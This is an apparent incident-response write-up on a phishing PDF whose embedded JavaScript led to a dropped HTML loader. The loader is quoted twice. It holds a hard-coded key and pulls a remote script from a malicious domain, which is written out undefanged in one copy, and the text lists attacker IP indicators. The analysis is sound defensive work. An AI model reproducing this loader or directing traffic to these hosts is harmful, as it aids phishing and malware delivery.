Incident Details
A phishing email was delivered to a distribution list (DL) and a user. One of the users from the DL opened the PDF file, triggering an alert in CB. Upon analysis, we observed that the PDF contains JavaScript (JS) with a constant key, which may be used for encryption. Since the compromised server used by the attacker cleared the second-stage JS file, the visibility for detecting potential ransomware is low. The detailed analysis is as follows:
Analyzed the file in Remux
From the above output, we observed there are two URIs
Use pdf-parser to get the URL
hxxp[://]45[.]11[.]182[.]128/index[.]php
After visiting the URL on the sandbox, it drops a js file
<!DOCTYPE html><html><head><script>
const url_string = “targeted email(intentional removed here)”;
const key = “27e2b9cb39107e8c0784dd5ea26383vb2u88jcda”;</script><script src=”https://modernanegocios.com.br/extra/assets/css/jiggy.js”></script></head><body><p>loading….</p></body></html>
Decoding this in Cyberchef gives us another js
There is a const Key that may be used for encryption
<!DOCTYPE html><html><head><script>
const url_string = “targeted email(intentional removed here)”;
const key = “27e2b9cb39107e8c0784dd5ea26383vb2u88jcda”;</script><script src=”https][://]modernanegocios.com[.]br/extra/assets/css/jiggy.js“>
